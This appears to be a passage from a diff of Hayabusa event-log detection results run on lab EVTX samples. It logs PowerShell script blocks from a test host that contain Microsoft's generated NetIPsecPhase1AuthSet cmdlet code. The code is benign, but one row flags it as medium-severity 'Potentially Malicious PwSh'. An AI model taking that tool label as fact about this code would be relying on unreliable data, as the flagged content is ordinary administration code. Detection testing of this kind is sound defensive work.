$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 